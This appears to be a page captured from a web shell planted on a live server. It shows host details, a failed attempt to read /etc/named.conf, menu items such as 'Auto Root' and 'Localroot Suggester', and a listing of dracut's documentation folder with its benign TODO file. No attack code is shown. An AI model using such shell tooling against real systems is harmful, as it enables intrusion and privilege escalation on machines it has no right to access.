Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.99.22
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
dracut-033 /
Delete
Unzip
Name
Size
Permission
Date
Action
AUTHORS
3.58
KB
-rw-r--r--
2013-09-12 12:52
COPYING
17.67
KB
-rw-r--r--
2013-09-12 12:52
HACKING
912
B
-rw-r--r--
2013-09-12 12:52
NEWS
28.14
KB
-rw-r--r--
2013-09-12 12:52
README
3.98
KB
-rw-r--r--
2013-09-12 12:52
TODO
1.89
KB
-rw-r--r--
2013-09-12 12:52
dracut.html
215.12
KB
-rw-r--r--
2020-09-30 15:57
dracut.png
7.24
KB
-rw-r--r--
2013-09-12 12:52
dracut.svg
68.34
KB
-rw-r--r--
2013-09-12 12:52
Save
Rename
Current TODO list, broken into things which are relevant for the initramfs itself (/init et al) vs the generator. A lot of things are/should be marked with "FIXME" in the code. Items are ordered in priority. INITRAMFS TODO - use info and warn prefix - generate systemd unit dracut-initramfs-restore in /run/systemd dynamically - put "root=" parsing hooks in separate hook dir - call "root=" parsing hooks after getting new rootpath from dhcp - put mount hook in main initqueue loop / careful about resume! - the hard-coded list of udev rules that we care about is kind of lame. - panic fallback - bridging/bonding without "netroot=" https://bugzilla.redhat.com/show_bug.cgi?id=822750 - progress indication for fsck https://bugzilla.redhat.com/show_bug.cgi?id=827118 - domain, searchdomain https://bugzilla.redhat.com/show_bug.cgi?id=840778 - disable write-ifcfg https://bugzilla.redhat.com/show_bug.cgi?id=840784 - check for /var to be mounted in convertfs https://bugzilla.redhat.com/show_bug.cgi?id=848172 - probably fix "--include" https://bugzilla.redhat.com/show_bug.cgi?id=849338 GENERATOR TODO - remove wait for swap devs, if no "resume=" is given on the kernel command line - add presets (predefined set of modules) - add interpreter/plugin-scripts to be sourced at the beginning or end (can use dracut-functions) - add mechanism for module specific command line options - pkg-config integration, to make it easy for other packages to use us. - default module specification could use some work - udev rule copying, as mentioned above, is a bit too hard-coded - dracut-install parse LD_SHOW_AUXV="" AT_PLATFORM for lib install CODE TODO - document more functions - make function vars local, and prefix with "_" Future Enhancement Requests - run ssh server to enter crypto password or perform debugging (supported by debian) - https://bugzilla.redhat.com/show_bug.cgi?id=524727 - dracut + encrypted root + networking